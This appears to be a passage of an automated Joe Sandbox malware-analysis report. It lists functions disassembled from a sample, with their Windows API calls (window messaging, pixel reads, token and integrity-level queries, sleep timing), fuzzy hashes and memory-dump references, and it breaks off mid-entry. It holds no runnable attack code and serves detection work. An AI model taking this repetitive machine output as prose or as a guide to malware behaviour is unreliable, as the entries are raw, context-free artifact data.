Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 14c37ad06f55f97ab76549dcebab8328812c99296f3f6b6b43586fa851195373
Instruction ID: d7af7f8904062522808a8214aaadd4a7a01193c1f36002d920e9ba404f9cf2a8
Opcode Fuzzy Hash: 14c37ad06f55f97ab76549dcebab8328812c99296f3f6b6b43586fa851195373
Instruction Fuzzy Hash: B631A471A1021AEFCB08CFB8DD9DADE7BB5EB44315F104229F925A72D1C77099A4CB90

Function 00275706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00275745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0027579D
_wcslen.LIBCMT ref: 002757AF
_wcslen.LIBCMT ref: 002757BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00275816

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: f2ea028cec47e422c92c66f30f63ab9f1703b5bc15753be5ae4c7190f7ecdcd1
Instruction ID: 99f42ec728ee073a25d49b5194eb98d33397153a4cd9062b6554b57441803a79
Opcode Fuzzy Hash: f2ea028cec47e422c92c66f30f63ab9f1703b5bc15753be5ae4c7190f7ecdcd1
Instruction Fuzzy Hash: C6218471924629DADB209F64DC84AEEF778FF44320F10C216E91D9A1C0D7B089A5CF50

Function 00260930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00260951
GetForegroundWindow.USER32 ref: 00260968
GetDC.USER32(00000000), ref: 002609A4
GetPixel.GDI32(00000000,?,00000003), ref: 002609B0
ReleaseDC.USER32(00000000,00000003), ref: 002609E8

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 7fad850415f83cac5f77667fd48c40e9053539fcfc4f52f5a612e272e09a4310
Instruction ID: 62be9c41a94feb7ccbc79ad01bf4cda40b3dae565aaa1c53ade11a7dfa174bdc
Opcode Fuzzy Hash: 7fad850415f83cac5f77667fd48c40e9053539fcfc4f52f5a612e272e09a4310
Instruction Fuzzy Hash: 9421A135610204AFD704EF65DC89AAFBBE9EF44701F10842CE84AA7352CB70AD44CB50

Function 0021CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0021CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021CDE9

Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,002B1444,?,001FFDF5,?,?,001EA976,00000010,002B1440,001E13FC,?,001E13C6,?,001E1129), ref: 00213852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0021CE0F
_free.LIBCMT ref: 0021CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0021CE31

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: ab70aabc7ede7ec34c64a1242f84e82e01b3abb24e78a21455f2c88e67779d7a
Instruction ID: dbba5a234119a9c1b5861d1e78e71f033f38c525fae2c9ac4a4f2a2225f499dc
Opcode Fuzzy Hash: ab70aabc7ede7ec34c64a1242f84e82e01b3abb24e78a21455f2c88e67779d7a
Instruction Fuzzy Hash: F501FC766512157F23211AB67C4CCBF79EDDFD6BA1335012DFD09C7200DA608DA181B0

Function 001F9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001F9693
SelectObject.GDI32(?,00000000), ref: 001F96A2
BeginPath.GDI32(?), ref: 001F96B9
SelectObject.GDI32(?,00000000), ref: 001F96E2

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 39aad8ef9f1da9230c1233cccf1911d66a62df29f6a90aae719716d91b35cf0c
Instruction ID: 5ee3917d01c7b4665748f7fc8ef7e6d471338751f3c79ab0c39f9e54a1e716b6
Opcode Fuzzy Hash: 39aad8ef9f1da9230c1233cccf1911d66a62df29f6a90aae719716d91b35cf0c
Instruction Fuzzy Hash: 5F214C70802789EBDB11AF64FC2C7B93BA8BB50366F60031AF514A61B0D37098A5CF94

Function 00245711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00245726
_memcmp.LIBVCRUNTIME ref: 00245744
_memcmp.LIBVCRUNTIME ref: 00245757
_memcmp.LIBVCRUNTIME ref: 0024576F
_memcmp.LIBVCRUNTIME ref: 00245787

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 96734a4e3a7589a620b8e9728010063761d6696a0e23c89d3cca6b6687238116
Instruction ID: 1da747dfacd625b3041764973bde0118919f4fb473397eb6fc1bc2004a7d4f48
Opcode Fuzzy Hash: 96734a4e3a7589a620b8e9728010063761d6696a0e23c89d3cca6b6687238116
Instruction Fuzzy Hash: 24019BA16B5615BBD20C96109E41FBAB35C9B25354B004035FD489A183F6B0ED31C6A1

Function 00212DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0020F2DE,00213863,002B1444,?,001FFDF5,?,?,001EA976,00000010,002B1440,001E13FC,?,001E13C6), ref: 00212DFD
_free.LIBCMT ref: 00212E32
_free.LIBCMT ref: 00212E59
SetLastError.KERNEL32(00000000,001E1129), ref: 00212E66
SetLastError.KERNEL32(00000000,001E1129), ref: 00212E6F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 00c55d0230e33a59ab4f6c063f78a8623e7dccf1607141725c59d30e1ec60330
Instruction ID: 888ff702767a64a76f04c47c010532131242b37f71e8a3c0792452b1f98124d9
Opcode Fuzzy Hash: 00c55d0230e33a59ab4f6c063f78a8623e7dccf1607141725c59d30e1ec60330
Instruction Fuzzy Hash: 1601F932275601E7C6127B347C89DEB25DAABF13B5B300028F819A22D3EE709CFD4460

Function 0024000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?,?,0024035E), ref: 0024002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?), ref: 00240064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240070

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 3a252fb00bb2b8e909258808ede1daceff0eff4965a0735f5314f3d1a4e963ad
Instruction ID: 058ff987e5dfeac1e80af5be7b53426e78186bfa9b52704504d1bdad9bd76c0a
Opcode Fuzzy Hash: 3a252fb00bb2b8e909258808ede1daceff0eff4965a0735f5314f3d1a4e963ad
Instruction Fuzzy Hash: E601F272610214BFDB214F78EC88BAA7AEDEF44751F245028FE09D3210D770DE808BA0

Function 0024E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0024E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0024E9A5
Sleep.KERNEL32(00000000), ref: 0024E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0024E9B7
Sleep.KERNEL32 ref: 0024E9F3

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 2841d061ee22891442b925bd589cb9ab0d9fb1d40b71b6892c4c688b3ab420ca
Instruction ID: 5b1ee4ef138ae2e3eca6fe46e85684be60c229e394c579fcb0a252e371c5b519
Opcode Fuzzy Hash: 2841d061ee22891442b925bd589cb9ab0d9fb1d40b71b6892c4c688b3ab420ca
Instruction Fuzzy Hash: FE015B31C1152ADBDF049FF5E84DAEDBB78BB08310F51055AE906B2181CB3095A4CB62

Function 002410F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00241114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 0024112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0024114D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 1c6c0125b645377ba70f25f850100d7acfca0c7ed21384fc59c9a5654df0cf98
Instruction ID: 5dfb7b18326306426db32e37975edfd09bd69fbbf81aed6fc2a37580ec3d5e83
Opcode Fuzzy Hash: 1c6c0125b645377ba70f25f850100d7acfca0c7ed21384fc59c9a5654df0cf98
Instruction Fuzzy Hash: 52011975200206BFDB154FA5EC4DA6A3B6EEF893A1B204429FA49D7360DA31DC909A60

Function 00240FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00240FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00240FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00240FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00240FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00241002

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 72871469708fdfd2ee9716e2909c6e4abd60ce77514fc2fbd8e1ded4d9b07c7f
Instruction ID: 40475bc5776333aa30569bfd6fc434daf93fb72a2d4aa1cba6fa2bcf18035fc1
Opcode Fuzzy Hash: 72871469708fdfd2ee9716e2909c6e4abd60ce77514fc2fbd8e1ded4d9b07c7f
Instruction Fuzzy Hash: 01F04935200312ABDB215FB4AC4DF563FADEF89762F604428FA4DD6251CA70DCA08A60

Function 00241014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0024102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00241036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0024104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241062

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: db2974789d52249872c47c770fb2046b8ebf155d4a634e444476624a5dc4cd1a
Instruction ID: b169f48817f54c75d5a2ab2dbb2d811e718b76a098e8c1cb3df9d033ba32c8cf
Opcode Fuzzy Hash: db2974789d52249872c47c770fb2046b8ebf155d4a634e444476624a5dc4cd1a
Instruction Fuzzy Hash: 09F06D35200312EBDB215FB4EC4DF563BADEF89B61F200428FE4DD7250CA70D8A08A60

Function 0025030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250324
CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250331
CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 0025033E
CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 0025034B
CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250358
CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250365

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7e48d249c5f6adfa48dd5dd509ad85ddc703ea426d83b8a7fd7c2311fe3087b7
Instruction ID: 760ccf41337c8c0b817cac90606ca2c3b06b1ae015fd01ae80b12620956b81da
Opcode Fuzzy Hash: 7e48d249c5f6adfa48dd5dd509ad85ddc703ea426d83b8a7fd7c2311fe3087b7
Instruction Fuzzy Hash: 3F019072810B16AFC730AF66DCC0416F7F5BF503163158A7ED19652931C371A968CE84

Function 0021D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0021D752

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000,00000000), ref: 002129F0

_free.LIBCMT ref: 0021D764
_free.LIBCMT ref: 0021D776
_free.LIBCMT ref: 0021D788
_free.LIBCMT ref: 0021D79A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ad2c034f456cd7e14fd5ed8ed62c894248e0f415bcda66164e4c906820ad4ecc
Instruction ID: a37196033110254f1d29410589381cfdfe8f7f53a1cdca02a5630c3bf5d7e048
Opcode Fuzzy Hash: ad2c034f456cd7e14fd5ed8ed62c894248e0f415bcda66164e4c906820ad4ecc
Instruction Fuzzy Hash: FAF0FF32564219EB8622EF68F9C9C96B7DDBB65720BB41805F048DB541CB24FCF18AA4

Function 00245C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00245C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00245C6F
MessageBeep.USER32(00000000), ref: 00245C87
KillTimer.USER32(?,0000040A), ref: 00245CA3
EndDialog.USER32(?,00000001), ref: 00245CBD

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: ec7b004a82f830b801a33c9892b5826bf10d5e4aa4ac78972aad13f4dc10422a
Instruction ID: 34faf9437d32699df0d57ae830d2c34f3bbb32aa08987eed8df55e7bf52daba6
Opcode Fuzzy Hash: ec7b004a82f830b801a33c9892b5826bf10d5e4aa4ac78972aad13f4dc10422a
Instruction Fuzzy Hash: 26018630510B14ABEB355F20EDCEFA677BCBB40B05F00055EB587A10E1DBF4A9948B91

Function 002122A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002122BE

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000,00000000), ref: 002129F0

_free.LIBCMT ref: 002122D0
_free.LIBCMT ref: 002122E3
_free.LIBCMT ref: 002122F4
_free.LIBCMT ref: 00212305

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 58bc90f284c2919c72e29fe2d59ad56bef39f1c740576430b51dc93dcb6a31ea
Instruction ID: 7fde5623b8153792cee26a66782cbd7696cd25e81b4e0669b0529891526e091c
Opcode Fuzzy Hash: 58bc90f284c2919c72e29fe2d59ad56bef39f1c740576430b51dc93dcb6a31ea
Instruction Fuzzy Hash: 7DF05EB1920124CB8713AF58BC498AD3BE4F729760760170AF814DA3B1CF3448B5AFE4

Function 001F95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 001F95D4
StrokeAndFillPath.GDI32(?,?,002371F7,00000000,?,?,?), ref: 001F95F0
SelectObject.GDI32(?,00000000), ref: 001F9603
DeleteObject.GDI32 ref: 001F9616
StrokePath.GDI32(?), ref: 001F9631

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 1ccc431c8358e648659500fd782beb2ad6247d6b7f06d16659b9d60ecf9f98b9
Instruction ID: 55df4e31dd317141d8ef5abb98aaeaff4c2b482a35f7efe0d4635237fe9d81a8
